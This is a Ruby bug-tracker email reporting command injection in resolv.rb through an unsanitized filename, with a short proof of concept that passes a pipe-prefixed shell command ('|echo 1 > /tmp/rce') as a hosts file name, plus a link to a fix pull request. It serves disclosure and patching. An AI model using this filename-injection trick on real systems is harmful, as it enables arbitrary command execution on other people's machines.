From: jazzy171120@...
Date: 2017-12-19T10:08:43+00:00
Subject: [ruby-core:84348] [Ruby trunk Bug#14205] Unsanitizied filename leads to command injection in 'resolv.rb'

Issue #14205 has been updated by drigg3r (Jasraj Bedi).

Subject changed from Unsanitizied filename leads to command injection in 'resolv' to Unsanitizied filename leads to command injection in 'resolv.rb'

PoC Concept Code
~~~ ruby
require 'resolv'
a = Resolv::Hosts::new("|echo 1 > /tmp/rce")
a.getaddress("test")
~~~


----------------------------------------
Bug #14205: Unsanitizied filename leads to command injection in 'resolv.rb'
https://bugs.ruby-lang.org/issues/14205#change-68524

* Author: drigg3r (Jasraj Bedi)
* Status: Open
* Priority: Normal
* Assignee: 
* Target version: 
* ruby -v: 
* Backport: 2.3: UNKNOWN, 2.4: UNKNOWN
----------------------------------------
Here is the pull request
https://github.com/ruby/ruby/pull/1777



-- 
https://bugs.ruby-lang.org/

Unsubscribe: <mailto:ruby-core-request@ruby-lang.org?subject=unsubscribe>
<http://lists.ruby-lang.org/cgi-bin/mailman/options/ruby-core>